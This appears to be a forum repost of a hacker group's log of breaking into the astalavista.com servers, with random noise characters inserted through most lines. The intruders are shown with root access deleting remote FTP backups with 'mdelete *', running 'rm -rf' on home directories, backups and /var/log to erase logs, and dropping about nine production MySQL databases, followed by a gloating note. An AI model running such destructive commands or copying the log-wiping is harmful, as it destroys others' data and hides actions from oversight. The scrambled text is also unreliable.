dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com+ B- q! i/ H( s1 i/ I9 e6 v
226 Transfer complete.
3 l2 ^% m- c9 f, n" _ftp> cd astalavista.com
/ e+ o" w) }4 A e/ W( C250 CWD command successful.+ V$ g- t/ K- p/ }% J0 P- r
ftp> ls -la, ]. N, y4 o& {& S* Z( ^( ~, @
227 Entering Passive Mode (212,254,194,163,2,189)
. \2 g7 L0 N. y; P9 {, i, c0 {& _( A150 Opening BINARY mode data connection for ‘file list’.9 k+ ^/ a1 ]3 e
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar1 q* e% H7 O4 Z* I" b. `0 O
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2$ E& u8 a a5 c% `% C4 a
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2% } r4 W+ o9 y0 K3 r
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar" z* x$ Y) t' d0 R
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar3 w4 R# { @8 L4 R
[snip]
: p$ B& p* O& u3 f% B6 J226 Transfer complete.+ Z, n8 y" o5 w6 N
ftp> mdelete *
+ X3 r5 s2 V' O& {# Uftp> ls -la
# Y# t! [4 O9 B7 e4 j4 k227 Entering Passive Mode (212,254,194,163,2,193)
8 K: C8 B P7 B( q* H150 Opening BINARY mode data connection for ‘file list’.) n' d& z: e; Q t
226 Transfer complete.1 W8 J8 u0 X3 G9 ~: n
ftp>6 U. S v9 O3 w& F1 c* P' ]
6 W6 c6 A% {7 g+ l$ v/ U5 ^
sh-3.2# cd /home
) r& C$ l" q$ y L& gsh-3.2# ls -la* l+ l! d8 V4 V- K# J9 `
total 1200 B. w' t* z! ?# F4 r6 }0 J
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .3 y! | V5 l9 r I; Y& l7 t) I# K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..' A) h) I2 `: T& @0 {% j& T3 h+ ^3 ~' r
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin: {% P( r/ B" B! O2 V
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& H( N. S8 Q+ G/ m) x* h6 x-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
, `/ J3 d( F& c! _. Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet9 _; y B; z. T3 L% M
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
! [$ l& v; S- z4 y2 Adrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
& G% r/ u' }* R5 w2 gdrwx–x–x 10 com com 4096 Apr 28 12:40 com% r& E: O+ P. k2 z
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
* S6 l$ w$ V7 M/ D( G c3 i# `! odrwx—— 3 jon jon 4096 Sep 21 2007 jon+ Z; Q* s# o, G2 g+ {( d
drwx—— 2 root root 16384 Sep 11 2007 lost+found8 A. A* ?# |0 ^ I1 i0 I) _- q
drwxr-xr-x 2 root root 4096 Sep 14 2007 my2 N+ T; l* I$ K9 b/ j5 H
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata; h, k$ h2 V% w9 N3 D* I
drwx—— 2 jon jon 4096 Sep 15 2007 test6 b g( v% x* i: H1 I$ ?6 p
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp. U/ _" G( \) h i* E
+ u7 o% L8 q' V8 a, csh-3.2# rm -rf backup/3 E+ W/ a' p1 I0 V
sh-3.2# rm -rf backup.14161/! R* q- z, N' d& E' j2 X
sh-3.2# rm -rf ftp/
& A8 V) O8 e2 f" p ysh-3.2# rm -rf jon/, f& o1 L/ X! n6 p/ P) Q
sh-3.2# rm -rf my/5 L) o' W. s8 j2 o {7 n
sh-3.2# rm -rf mysqldata/& L& j# ?& L* k. M/ h; L" K
sh-3.2# rm -rf test/
& I" f% B$ k7 z: Xsh-3.2# rm -rf tmp/: n2 z5 F9 H4 i8 s* Y% ]- \2 a
sh-3.2# cd ~. h) w1 @! Y! ~( l* R' J& X
sh-3.2# rm -rf *5 O, J, t( j# \# c; M, N
sh-3.2# rm -rf /var/log/3 l# u3 J# ^* c c3 T5 n$ P/ w( G: P
rm: cannot remove directory `/var/log//proftpd’: Directory not empty* p6 W. \! D" c$ q
sh-3.2# rm -rf /home/*! g+ `+ j1 l0 n, o% _; P R/ q9 z+ i
sh-3.2# mysql
. S1 n! n' h+ c& u8 mWelcome to the MySQL monitor. Commands end with ; or \g. W" P: _* l) A, y
Your MySQL connection id is 407156
7 N! [3 o$ k5 B% Z/ Z6 K7 OServer version: 5.0.45-community-log MySQL Community Edition (GPL)
' E/ I1 }. m5 C- M3 a
6 A4 k- ~- f8 P d) ^5 q7 kType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
2 c4 a& N7 y8 p2 Z2 L0 ~4 m3 u. C
- ]3 a0 ?+ f# {7 ~, Z! kmysql> show databases;, F( r$ J' w" z: \
+———————–++ C$ U! |5 n6 V! O% f# i
| Database |
/ {7 e! y, p- |+ T* e2 p" F1 u+———————–+( O3 J$ \( v. ]& i
| information_schema |
8 v8 l% v( _ l3 h% M| astanet_ads |
% T/ H, B+ y$ S! m6 D; f| astanet_mailing_lists |
# C \7 r" u# Q- j$ p5 q| astanet_mediawiki |/ i: c2 Z8 Y0 b
| astanet_membersystem |# P+ B& J/ k) B* C
| com_contrexx |1 v2 h' \9 t7 S: G4 v8 F
| com_contrexx2 |, i% W6 f( K4 T! w5 |. U) c
| com_contrexx2_live |% l# v: r( ~) H/ v. V: i
| da_roundcube |2 r+ ~& }+ i+ w' ]* D Y
| dolphin |& a, o$ D1 {1 L9 k( ?; i* _+ w
| ideapool |
7 m1 y5 k0 q" c% [" r3 b: U| mysql |$ t: k) d/ q7 T5 Q' k5 Y. S' g6 K! O
| test |
. Y O3 _% d$ A) G- x' O| yourmaster |0 J4 e, f* m; ~2 v6 l1 s7 P. w; |
+———————–+, t- H+ y& }# W: H! W
14 rows in set (0.03 sec)
# |! b9 R% W- r- ?0 @$ `6 H( [# ]# N# p" A7 o6 o9 d( |
mysql> drop database astanet_membersystem;
' ~: z) V; p, |+ d, N5 i/ pdroQuery OK, 46 rows affected (0.81 sec)
8 Q: x+ F! J/ j* q
' J1 G- c( O% g: n7 G6 m8 Mmysql> drop database com_contrexx;% S; I* c$ z& a& N" |( V
Query OK, 211 rows affected (2.72 sec)
8 H5 [3 K& V# l' e9 C, k. d8 q5 O
* x" `. M' s5 k4 imysql> drop database com_contrexx2;! l; I' x2 B5 g9 I9 v
Query OK, 237 rows affected (2.23 sec)
" r. c* g& o9 n6 _9 o& Z( R
! x* B d8 Y; Y4 ymysql> drop database com_contrexx2_live;5 E( U' ^7 D9 Z8 \0 Z! |0 }4 E
Query OK, 227 rows affected (7.63 sec)
5 Y- F8 t) o1 o& b1 C) x9 c) B. n$ i
mysql> drop database ideapool;
/ G: Z0 b7 `6 n9 n; bQuery OK, 69 rows affected (0.19 sec)9 Y2 M4 V$ d, L* [. |) G
7 W% L5 t( u& @, b5 D w D& amysql> drop database yourmaster;0 W2 M% s% ?% z& @4 ?; S* f; J
Query OK, 158 rows affected (0.55 sec)
. Y' u$ e' O" ~, {/ m7 q8 M, s. ~9 J! a6 A/ m0 q
mysql> drop database astanet_ads;
/ m, o; w0 ^/ M6 jQuery OK, 9 rows affected (0.11 sec)
" `1 k; G1 B1 R; p. w
4 a4 q" a% M: t& N+ C qmysql> drop database astanet_mailing_lists;
! B8 E. ^: n! B2 F7 O0 s' zQuery OK, 24 rows affected (1.47 sec)
& j8 @* u- Q" T: S, Y& x" e3 D
. c0 s8 Y5 U, _1 P% C" Smysql> drop database astanet_mediawiki;
4 O3 C" \+ \6 f: ~Query OK, 31 rows affected (0.51 sec), G3 |& A# {7 o$ U% O
5 Y5 q& t5 i9 l0 h8 Amysql> show databases;( `6 r L- ^0 I4 d0 l
+——————–+
! T+ O" K/ i) S) R3 D: [| Database |) x2 m% U- T8 s; f S2 I3 p
+——————–+
; @& f0 G8 S* H, m% q: u| information_schema |; m7 ~2 M. R6 |- Q" i: ]1 K7 d
| da_roundcube |8 F7 _5 s$ h/ o# O* v2 S) W
| dolphin |
q" e: t6 E# y" t1 O6 R* N| mysql |9 S3 a1 r' A M. X; {" S% ~! \
| test |
; [* E' _4 b8 \7 j: ~+ g" }+——————–+
* ` m# U" X; N* U1 Y0 e* }5 rows in set (0.00 sec)
1 b2 h& Y2 x2 Y8 f+ S' q2 y; W- p; W5 |( l
What a journey! We’re not sure exactly why the “Terminator” had any influence on9 W: p3 a* @$ T& c; L, A
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the5 b1 Q, ?3 o8 f# P* T
wrong to say this pack of morons *wont be back*.! A4 y+ T- h$ B- q
|
发表于 2012-11-6 21:07:34
收藏
支持
反对